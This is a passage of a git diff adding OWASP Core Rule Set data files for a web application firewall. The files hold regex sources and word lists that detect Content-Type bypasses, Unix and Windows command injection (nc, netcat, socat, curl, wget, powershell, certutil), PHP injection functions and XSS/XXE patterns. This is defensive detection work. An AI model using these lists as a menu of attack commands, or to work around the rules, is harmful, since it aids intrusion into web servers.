+ ##!=> allowed-charsets
+|(?:
+ ##!=>
+[^c{{non-token-chars}}]{{token-chars}}*
+c[^h{{non-token-chars}}]{{token-chars}}*
+ch[^a{{non-token-chars}}]{{token-chars}}*
+cha[^r{{non-token-chars}}]{{token-chars}}*
+char[^s{{non-token-chars}}]{{token-chars}}*
+chars[^e{{non-token-chars}}]{{token-chars}}*
+charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+)\s*+=\s*+{{token-with-dquote-chars}}+)
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+;?
+ ##!=>
+)*)*
+ ##!=>
+ ##!<
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data
new file mode 100644
index 000000000..b2e0cff00
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921421.data
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json"
+##! Find Content-Type: application/soap+xml;boundary="application/json"
+^[^;\s,]+[;\s,].*?application\/json
+
+##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json"
+##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json"
+^[^;\s,]+[;\s,].*?application\/.+[+]json
+
+##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml"
+##! Find Content-Type: application/json;boundary="application/soap+xml"
+^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data
new file mode 100644
index 000000000..7be243c33
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/921422.data
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##! Attacks attempting to bypass content-type restrictions or behaviour
+##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data"
+##! Find Content-Type: application/soap-xml;boundary="multipart/form-data"
+^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b
+^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b
+^[^;\s,]+[;\s,].*?\b(\/|\+)\b
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data
new file mode 100644
index 000000000..0ea83ec0b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/922110-chain1.data
@@ -0,0 +1,105 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##! The expression generated from this file matches a full HTTP
+##! `Accept` header by following the specification as far as
+##! necessary, while restricting the `charset` parameter
+##! to a list of explicitly allowed values.
+##! Where possible, the expression matches tokens "loosely",
+##! to reduce complexity and the risk of false positives.
+
+##! Specifications:
+##! https://httpwg.org/specs/rfc7231.html#request.conneg
+##! https://httpwg.org/specs/rfc7230.html
+
+##! This is a duplicate of the 920600.data file.
+##! There will be support for inclusion in the regexp_assemble tool in the future.
+##! In the meantime, please keep both files in sync.
+
+##!^ ^
+##!$ $
+
+##! Helpers
+##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{}
+
+##!> template non-token-chars \"{{non-token-with-dquote-chars}}
+
+##!> template token-chars [^{{non-token-chars}}]
+
+##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}]
+
+##!> template type-subtype (?:\*|{{token-chars}}+)
+
+##!> template media-type {{type-subtype}}/{{type-subtype}}
+
+##! list of allowed charsets
+ ##!> assemble
+(?:"?
+ ##!=>
+ ##!> include allowed-charsets
+ ##!=>
+\b"?))
+ ##!=< allowed-charsets
+ ##!<
+
+
+##! Main assembly
+ ##!> assemble
+(?:{{media-type}})
+ ##!=>
+(?:\s*+;\s*+
+ ##!=>
+(?:(?:charset\s*+=\s*+
+ ##!=>
+ ##!=> allowed-charsets
+
+ ##! If the first part wasn't a "charset", then
+ ##! anything is allowed here that is not "charset".
+ ##! Note that this doesn't follow the RFC strictly.
+|(?:
+ ##!=>
+[^c{{non-token-chars}}]{{token-chars}}*
+c[^h{{non-token-chars}}]{{token-chars}}*
+ch[^a{{non-token-chars}}]{{token-chars}}*
+cha[^r{{non-token-chars}}]{{token-chars}}*
+char[^s{{non-token-chars}}]{{token-chars}}*
+chars[^e{{non-token-chars}}]{{token-chars}}*
+charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+)\s*+=\s*+{{token-with-dquote-chars}}+)
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+;?
+ ##!=>
+)*
+ ##!=>
+
+ ##! Multiple "media-range" expressions can be
+ ##! specified, comma separated.
+(?:\s*+,\s*+
+ ##!=>
+(?:{{media-type}})
+ ##!=>
+(?:\s*+;\s*+
+ ##!=>
+(?:(?:charset\s*+=\s*+
+ ##!=>
+ ##!=> allowed-charsets
+|(?:
+ ##!=>
+[^c{{non-token-chars}}]{{token-chars}}*
+c[^h{{non-token-chars}}]{{token-chars}}*
+ch[^a{{non-token-chars}}]{{token-chars}}*
+cha[^r{{non-token-chars}}]{{token-chars}}*
+char[^s{{non-token-chars}}]{{token-chars}}*
+chars[^e{{non-token-chars}}]{{token-chars}}*
+charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+)\s*+=\s*+{{token-with-dquote-chars}}+)
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+;?
+ ##!=>
+)*)*
+ ##!=>
+ ##!<
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data
new file mode 100644
index 000000000..924451655
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/include/allowed-charsets.data
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##! This list is in sync with the default value of tx.allowed_request_content_type_charset.
+
+iso-8859-1
+iso-8859-15
+utf-8
+windows-1252
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt
new file mode 100644
index 000000000..f1cfb5760
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932100.txt
@@ -0,0 +1,168 @@ +# Word list for rule 932100 (RCE Unix command injection part 1/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +# Special regexp case for the '.' (source) command to prevent FP: +'\.\s.* + +7z +7za +7zr +adduser +alias+ +apt-get +arch+ +arp +awk+ +bash +batch+ +breaksw +bsdcat +bsdiff +bsdtar +builtin +bzcat +bzdiff +bzegrep +bzfgrep +bzgrep +bzip2 +bzless +bzmore +cat+ +cc+ +chattr +chdir+ +chflags +chmod +command+ +compress+ +coproc +cp+ +crontab +csh +curl +dash +dhclient +diff+ +dmesg +doas +done +dpkg +du+ +echo+ +egrep +endif +endsw +env +env-update +esac +eval +exec+ +expand +export +expr +fc+ +fetch+ +fgrep +fi +file+ +filetest +find+ +foreach +ftp+ +ftpstats +ftpwho +function +gcc+ +gdb +GET+ +getfacl+ +git+ +grep+ +gunzip +gzcat +gzip +head+ +history +hostid +hostname +htdigest +htpasswd +hup+ +# 'id' causes way too much FP, so we require whitespace; this will allow +# injecting ';id' unfortunately. +id+ +ifconfig +ip6tables +ipconfig +iptables +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java+ +jexec +jobs+ +kill+ +killall +last+ +lastcomm +lastlog +lastlogin +ldconfig +ldd+ +less+ +lessecho +lessfile +lesspipe +lftp +lftpget +ln+ +local+ +locate+ +logname +lp+ +ls +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx+ +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmore +mailq +mailx+ +mkdir+ +mlocate +more+ 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt
new file mode 100644
index 000000000..e2bce2145
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932105.txt
@@ -0,0 +1,174 @@ +# Word list for rule 932105 (RCE Unix command injection part 2/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +mount+ +mutt+ +mv+ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano+ +nc+ +nc.openbsd +nc.traditional +ncat +net+ +netcat +netkit-ftp +netstat +nice+ +nmap +nohup +nping +nslookup +nstat +onintr +openssl +passwd +patch+ +perl +perl5 +perlsh +perms +pftp +pgrep +php +php5 +php7 +ping +pkexec +pkg +pkg_info +pkginfo +pkill +popd +printenv +printf+ +ps+ +ptar +ptardiff +ptargrep +pushd +python +python2 +python3 +python3m +rar+ +rcp+ +realpath +rename+ +repeat+ +replace+ +rm+ +rmdir+ +rmuser +rnano +route +rpm+ +rsync +ruby +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +sched +scp+ +sdiff +sed+ +sendmail +set+ +setenv +setfacl+ +setsid +sftp +sh+ +sh.distrib +shutdown +sleep +socat +sort+ +source+ +ssh +strings +su+ +sudo +svn +sysctl +tail +tailf +tar+ +tcping +tcptraceroute +tcsh +tee+ +telnet +time+ +timeout +top +touch+ +traceroute +traceroute6 +ulimit+ +uname +uncompress +unlink+ +unlzma +unrar +unset +unxz +unzip +useradd +userdel +usermod +vigr +vim+ +vipw +w3m +wget +# 'who' causes many FP, so require whitespace. +# Unfortunately, without whitespace it may still leak some info. 
+who+ +whoami +xargs +xterm +xxd+ +xz+ +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yum +zcat +zcmp +zdiff +zegrep +zfgrep +zgrep +zip+ +zless +zmore +zrun +zsh diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt new file mode 100644 index 000000000..138764fac --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932106.txt @@ -0,0 +1,26 @@ +# Word list for rule 932106 (RCE Unix command injection part 3/3) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff+ + +vi+ +ps +pwd +who +w+ +aptitude+ +pacman+ +dnf+ +up2date+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt new file mode 100644 index 000000000..b96466151 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932110.txt 
@@ -0,0 +1,164 @@ +# Word list for rule 932110 (RCE Windows command injection part 1/2) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff@ + +7z +7za +7zr +addusers +admodcmd +arp@ +assoc +attrib +azman +bcdboot +bcdedit +bitsadmin +bootcfg +browstat +cacls +call@ +certreq +certutil +#disabled for FP: change +chdir@ +chkdsk +chkntfs +cipher +cleanmgr +clearmem +cluster +cmd +cmdkey +comexp +comp@ +compact@ +compmgmt +con2prt +convert +copy +csccmd +cscript +csvde +curl +date@ +dcomcnfg +debug +defrag +del@ +delprof +deltree +devcon +devmgmt +diff@ +dir@ +diruse +diskmgmt +diskpart +diskshadow +dnsstat +doskey +driverquery +dsacls +dsadd +dsget +dsmod +dsmove +dsquery +dsrm +dxdiag +echo +egrep +endlocal +erase +eventcreate +eventvwr +expand@ +explorer +fc@ +fgrep +find@ +findstr +foreach +forfiles +format@ +freedisk +fsmgmt +fsutil +ftp@ +ftype +gathernetworkinfo +getmac +git@ +gpedit +gpresult +gpupdate +hdwwiz +hostname +icacls +ifmember +inetcpl +ipconfig +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java@ +label@ +logevent +logman +logoff +logtime +lusrmgr +mapisend +mbsacli +md@ +mdsched +measure +mkdir@ +mklink +mmsys +mode@ +more@ +mount@ +mountvol +moveuser +msconfig +msg@ +msiexec +msinfo32 +mstsc +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nbtstat +nc@ +ncat +net@ +netcat +netdom +netsh +netstat +netsvc +nmap +nslookup +ntbackup +ntrights 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt
new file mode 100644
index 000000000..cdbdf7d71
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt
@@ -0,0 +1,164 @@ +# Word list for rule 932115 (RCE Windows command injection part 2/2) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff@ + +odbcad32 +odbcconf +openfiles +path@ +pathping +perfmon +perl +perl5 +perlsh +php +php5 +php7 +ping +pkgmgr +popd +portqry +powercfg +powershell +powershell_ise +print@ +printbrm +prncnfg +prnmngr +prompt +psexec +psfile +psgetsid +psinfo +pskill +pslist +psloggedon +psloglist +pspasswd +psping +psservice +psshutdown +pssuspend +pushd +python +python2 +python3 +python3m +qgrep +qprocess +query@ +qwinsta +rar@ +rasdial +rasphone +rd@ +recdisc +recover +reg@ +regedit +regini +regsvr32 +rekeywiz +ren@ +rename@ +replace@ +reset@ +rm@ +rmdir@ +rmtshare +robocopy +route@ +rstrui +rsync +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +runas +rundll32 +schtasks +sclist +secpol +select +set@ +setlocal +setx@ +sfc +share +shellrunas +shift +shortcut +showgrps +showmbrs +shrpubw +shutdown +sigverif +sleep +slmgr +sort +start@ +subinacl +subst +svn +sysdm +syskey +systeminfo +systempropertiesadvanced +systempropertiesdataexecutionprevention +systempropertieshardware +systempropertiesperformance +takeown +taskkill +tasklist +taskmgr +taskschd +telnet +timeout +tlist +tpminit +tracert +tree +tsdiscon +tsshutdn +type@ +typeperf +unrar +unzip +useraccountcontrolsettings +usrstat +verify +vol@ +waitfor +wevtutil +wget +#disabled for FP: where@ +whoami +windiff +winmsdp +winrm +winrs +winvar +wmic 
+wmimgmt +wscript +wscui +wuapp +wuauclt +wusa +xcacls +xcopy +zip@ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data new file mode 100644 index 000000000..a9561c3ee --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data @@ -0,0 +1,5 @@ +\$\(.*\) +\$\{.*\} +<\(.*\) +>\(.*\) +\$\(\(.*\)\) diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data new file mode 100644 index 000000000..05980b6c0 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data @@ -0,0 +1,2 @@ +\bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do +\bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt new file mode 100644 index 000000000..caaa8c4ad --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt 
@@ -0,0 +1,203 @@ +# Word list for rule 932150 (RCE Unix command injection) +# To lower FP, this rule requires whitespace after a command. +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# + +bash +bsdcat +bsdiff +bsdtar +builtin +bzcat +bzdiff +bzegrep +bzfgrep +bzgrep +bzless +bzmore +cc +command +coproc +csh +curl +dash +diff +dmesg +doas +echo +egrep +env +eval +exec +fetch +fgrep +filetest +ftpstats +ftpwho +gcc +GET +grep +gzcat +gzip +head +hup +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java +jobs -x +lastcomm +lastlog +lastlogin +lessecho +lessfile +lesspipe +lftp +lftpget +ls +ls-F +lsb_release +lscpu +lsmod +lsof +lspci +lsusb +lwp +lwp-download +lynx +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmore +mailq +mlocate +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nc +nc.openbsd +nc.traditional +ncat +netcat +netkit-ftp +netstat +nohup +nping +nstat +onintr +perl +perl5 +pftp +pgrep +php +php5 +php7 +ping +pkexec +pkill +popd +printenv +ptar +ptardiff +ptargrep +python +python2 +python3 +python3m +rcp +realpath +rename +repeat +replace +rmdir +rmuser +rnano +rsync +ruby +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +sched +scp +sdiff +sed +sendmail +setenv +setsid +sftp +sh +sh.distrib +socat +source +ssh +strings +sudo +svn +sysctl +tail +tailf +tar +tcping +tcptraceroute +tcsh +telnet +time +timeout +traceroute +traceroute6 +uname +uncompress +unlzma +unrar +unset +unxz +unzip +useradd +userdel +usermod +vigr +vipw +w3m +wget +whoami +xargs +xz +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +zcat +zcmp +zdiff +zegrep +zfgrep +zgrep +zip +zless +zmore +zrun +zsh 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data
new file mode 100644
index 000000000..a4df468f4
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data
@@ -0,0 +1,16 @@
+AUTH_TYPE
+HTTP_ACCEPT
+HTTP_ACCEPT_CHARSET
+HTTP_ACCEPT_ENCODING
+HTTP_ACCEPT_LANGUAGE
+HTTP_CONNECTION
+HTTP_HOST
+HTTP_KEEP_ALIVE
+HTTP_REFERER
+HTTP_USER_AGENT
+HTTP_X_FORWARDED_FOR
+ORIG_PATH_INFO
+PATH_INFO
+PATH_TRANSLATED
+QUERY_STRING
+REQUEST_URI
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data
new file mode 100644
index 000000000..ed5190b19
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data
@@ -0,0 +1,226 @@
+array_diff_uassoc
+array_diff_ukey
+array_filter
+array_intersect_uassoc
+array_intersect_ukey
+array_map
+array_reduce
+array_udiff
+array_udiff_assoc
+array_udiff_uassoc
+array_uintersect
+array_uintersect_assoc
+array_uintersect_uassoc
+assert
+assert_options
+base64_encode
+bson_decode
+bson_encode
+bzopen
+chr
+convert_uuencode
+create_function
+curl_exec
+curl_file_create
+curl_init
+debug_backtrace
+error_reporting
+escapeshellarg
+escapeshellcmd
+eval
+exec
+exif_imagetype
+exif_read_data
+exif_tagname
+exif_thumbnail
+file
+file_exists
+fileatime
+filectime
+filegroup
+fileinode
+filemtime
+fileperms
+finfo_open
+fopen
+fputs
+ftp_connect
+ftp_get
+ftp_nb_get
+ftp_nb_put
+ftp_put
+function_exists
+fwrite
+get_cfg_var
+get_current_user
+get_meta_tags
+getcwd
+getenv
+getimagesize
+getlastmod
+getmygid
+getmyinode
+getmypid
+getmyuid
+glob
+gzcompress
+gzdeflate
+gzencode
+gzfile
+gzopen
+gzread
+gzwrite
+hash_file
+hash_hmac_file
+hash_update_file
+header_register_callback
+hex2bin
+highlight_file
+html_entity_decode
+htmlentities
+htmlspecialchars
+htmlspecialchars_decode
+image2wbmp
+imagecreatefromgif
+imagecreatefromjpeg
+imagecreatefrompng
+imagecreatefromwbmp
+imagecreatefromxbm
+imagecreatefromxpm
+imagegd
+imagegd2
+imagegif
+imagejpeg
+imagepng
+imagewbmp
+imagexbm
+ini_get
+ini_get_all
+ini_set
+iptcembed
+is_dir
+is_executable
+is_file
+is_readable
+is_writable
+is_writeable
+iterator_apply
+json_decode
+json_encode
+mb_ereg
+mb_ereg_match
+mb_ereg_replace
+mb_ereg_replace_callback
+mb_eregi
+mb_eregi_replace
+mb_parse_str
+md5_file
+method_exists
+mkdir
+move_uploaded_file
+mysql_query
+ob_clean
+ob_end_clean
+ob_end_flush
+ob_flush
+ob_get_clean
+ob_get_contents
+ob_get_flush
+ob_start
+odbc_connect
+odbc_exec
+odbc_execute
+odbc_result
+odbc_result_all
+opendir
+parse_ini_file
+parse_str
+passthru
+pg_connect
+pg_execute
+pg_prepare
+pg_query
+php_strip_whitespace
+php_uname
+phpinfo
+phpversion
+popen
+posix_getegid
+posix_geteuid
+posix_getgid
+posix_getlogin
+posix_getpwnam
+posix_kill
+posix_mkfifo
+posix_mknod
+posix_ttyname
+preg_match
+preg_match_all
+preg_replace
+preg_replace_callback
+preg_replace_callback_array
+preg_split
+print_r
+proc_close
+proc_get_status
+proc_nice
+proc_open
+proc_terminate
+putenv
+rawurldecode
+rawurlencode
+read_exif_data
+readdir
+readfile
+readgzfile
+register_shutdown_function
+register_tick_function
+rename_function
+runkit_constant_add
+runkit_constant_redefine
+runkit_function_add
+runkit_function_copy
+runkit_function_redefine
+runkit_function_rename
+runkit_method_add
+runkit_method_copy
+runkit_method_redefine
+runkit_method_rename
+session_set_save_handler
+session_start
+set_error_handler
+set_exception_handler
+set_include_path
+set_magic_quotes_runtime
+setdefaultstub
+sha1_file
+show_source
+simplexml_load_file
+simplexml_load_string
+socket_connect
+socket_create
+spl_autoload_register
+sqlite_array_query
+sqlite_create_aggregate
+sqlite_create_function
+sqlite_exec
+sqlite_open
+sqlite_popen
+sqlite_query
+sqlite_single_query
+sqlite_unbuffered_query
+stream_context_create
+stream_socket_client
+stripcslashes
+stripslashes
+strrev
+system
+tmpfile
+uasort
+uksort
+unpack
+unserialize
+urldecode
+urlencode
+usort
+var_dump
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data
new file mode 100644
index 000000000..113b9558d
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data
@@ -0,0 +1,202 @@
+abs
+acos
+acosh
+array
+arsort
+asin
+asinh
+asort
+assert
+atan
+atan2
+atanh
+basename
+bindec
+ceil
+chdir
+checkdate
+chmod
+chop
+chown
+chroot
+closedir
+closelog
+compact
+constant
+copy
+cos
+cosh
+count
+crypt
+current
+date
+decoct
+define
+defined
+die
+dir
+dirname
+diskfreespace
+dl
+doubleval
+each
+easter_date
+easter_days
+echo
+empty
+end
+ereg
+eregi
+error_log
+exit
+exp
+explode
+extract
+fclose
+feof
+fgets
+fileowner
+filepro
+filesize
+filetype
+floatval
+flock
+floor
+flush
+fmod
+fread
+fstat
+ftell
+ftok
+function
+getdate
+gettext
+gettype
+gmdate
+hash
+header
+headers_list
+headers_sent
+hebrev
+hypot
+iconv
+idate
+implode
+include
+intdiv
+intval
+invoke
+is_a
+is_array
+is_bool
+is_callable
+is_double
+is_finite
+is_float
+is_infinite
+is_int
+is_integer
+is_link
+is_long
+is_nan
+is_null
+is_numeric
+is_object
+is_real
+is_resource
+is_scalar
+is_string
+isset
+join
+key
+ksort
+lcfirst
+levenshtein
+link
+linkinfo
+list
+localtime
+log
+log10
+log1p
+lstat
+ltrim
+mail
+main
+max
+mbereg
+mbsplit
+metaphone
+mhash
+microtime
+min
+msql
+mysql
+natsort
+next
+octdec
+openlog
+ord
+pack
+pathinfo
+pclose
+pi
+pos
+pow
+prev
+print
+printf
+quotemeta
+rand
+range
+readline
+readlink
+recode
+rename
+require
+reset
+rewind
+round
+rsort
+rtrim
+scandir
+serialize
+settype
+shuffle
+similar_text
+sin
+sinh
+sizeof
+sleep
+sort
+soundex
+split
+spliti
+sprintf
+sqrt
+srand
+stat
+strcoll
+strlen
+strspn
+substr
+symlink
+syslog
+taint
+tan
+tanh
+tempnam
+textdomain
+time
+touch
+trim
+ucfirst
+umask
+uniqid
+unlink
+unset
+untaint
+usleep
+usort
+virtual
+wordwrap
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt
new file mode 100644
index 000000000..64065bc61
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt
@@ -0,0 +1,8 @@
+_\$\$ND_FUNC\$\$_
+__js_function
+\beval\s*\(
+String\s*\.\s*fromCharCode
+function\s*\(\s*\)\s*{
+new\s+Function\s*\(
+this\.constructor
+module\.exports\s*=
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data
new file mode 100644
index 000000000..80ea2def4
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data
@@ -0,0 +1,10 @@
+(?i)[\s\S]xlink:href\b
+(?i)[\s\S]xhtml\b
+(?i)[\s\S]xmlns\b
+(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b
+(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b
+(?i)[\s\S]data:text/html\b
+(?i)[\s\S]formaction\b
+(?i)[\s\S]@import\b
+(?i)[\s\S];base64\b
+(?i)[\s\S]pattern\b.*?=\b
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data
new file mode 100644
index 000000000..18f8d41b3
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data
@@ -0,0 +1,308 @@
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g
